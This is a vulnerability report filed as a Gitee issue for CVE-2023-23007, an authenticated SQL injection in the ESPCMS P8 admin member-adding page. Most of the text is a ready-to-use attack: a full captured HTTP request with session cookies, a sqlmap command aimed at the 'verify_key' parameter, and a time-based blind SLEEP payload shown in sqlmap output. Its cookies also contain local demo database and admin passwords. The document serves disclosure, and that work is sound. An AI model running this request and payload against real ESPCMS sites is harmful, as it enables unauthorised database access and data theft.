CVE-2023-23007: There is a sql injection vulnerability in ESPCMS P8.21120101 · Issue #I680WG · 轻舞飞沙/易思ESPCMS-P8企业建站管理系统 - Gitee.com

****Issue****

After logging in to the background, there is a SQL injection vulnerability in adding member function points

****Steps to reproduce****

1. Log in to the management background
2. Click Member>Add Member

Problematic packets:

GET /espcms_admin/index.php?act=X9DCVqHOg51sW5WnJNik2%2BEh6%2BhfdozuajbeQYirJJk%3D&verify_value=xxx&verify_key=username&verifyType=0 HTTP/1.1
Host: 127.0.0.1:8010
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8010/espcms_admin/index.php?act=RCJVc7i2vPJsW5WnJNik2yqO9KotWWATQJ%2BJr83OPQ4%3D&par_iframes_name=espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36&iframes_name=espcms_tab_iframe_731749b97e8fc862e9de34d80c1fa7c8&freshid=0.07419096625411115
Cookie: espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_now_page=0; espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_per_page_num=20; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_now_page=1; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_per_page_num=20; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_now_page=0; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_per_page_num=20; espcms_admin_user_info=vHzemLN06s%2BCBCZmysn5BEspscayx5moFZbFc%2BYiMsiK0A8JxQV1DgryT8ALHbP%2FpWpbeeMDWVhDSQf9nN0bg2oehJsC38ek42J4vhZ%2BEpBhUHpwgyAokKcDe9vfVTK81r9Qa0Zk0J46c5yrfur061b%2B5m%2F63da2Tp1gB7Bzm1wUVS5K648%2B8RXzpevd9RO03oyPJPqCojA0scG7KhdhwuutSQMB1m71Ng4%2BPvDfjsR%2FlRBzorN2mVwfNgUpPvbLOU0HNAi9NgJAwOPqLRQaP6G3EItDbWNtTVcfATuOhD2wspV3ear%2Bx7iP0kfiTurVPrUe%2FJPzcqhl3ubkaeNRuRhCKQsDDu8Iac%2FKrilQamMDIkjdXmZhHNY6an3KLn7247Nlm9K4zgTeEOesUWP2YGKnN0mtOfNbgBQNJRcx5rFfSW0VlP%2BVIzSxwbsqF2HCMSQ44W0oifYTfA69ictDGQ0uLADH%2BpdZ; espcms_admin_user_server_info=N8LTSEOntanP%2Bv9d2FaEWTLHmuuYWpMc8zj6G50bHR%2Fr%2BZotmzdaJM%2F6%2F13YVoRZNBBGeYuLw0rz73sgkXaYDqOpkSEbSBU5; PHPSESSID=nh6n2915gtuedqm93nql1nuv1k; espcms_setup_db=a%3A14%3A%7Bs%3A7%3A%22db_host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A7%3A%22db_name%22%3Bs%3A15%3A%22espcms_p8_demo1%22%3Bs%3A7%3A%22db_user%22%3Bs%3A4%3A%22root%22%3Bs%3A11%3A%22db_password%22%3Bs%3A4%3A%22root%22%3Bs%3A9%3A%22db_prefix%22%3Bs%3A7%3A%22espcms_%22%3Bs%3A12%3A%22db_setuptype%22%3Bs%3A1%3A%220%22%3Bs%3A11%3A%22db_linktype%22%3Bs%3A1%3A%220%22%3Bs%3A13%3A%22module_dbdemo%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22module_app%22%3Bs%3A1%3A%220%22%3Bs%3A14%3A%22admin_username%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22admin_email%22%3Bs%3A15%3A%22admin%40admin.com%22%3Bs%3A14%3A%22admin_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A19%3A%22validation_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A7%3A%22webname%22%3Bs%3A6%3A%22espcms%22%3B%7D; espcms_admin_login_verification_code=93CeyfmSi1jO%2BQUah35IwA%3D%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

use sqlmap: sqlmap.py -r ss.txt -p verify_key --current-db

---
Parameter: verify_key (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: act=or73S4mLbK+u7ZRDsPSnahehmi0uNdR25zCzZisJjaI=&verify_value=xxxx&verify_key=username AND (SELECT 3018 FROM (SELECT(SLEEP(5)))QCXL)&verifyType=0
---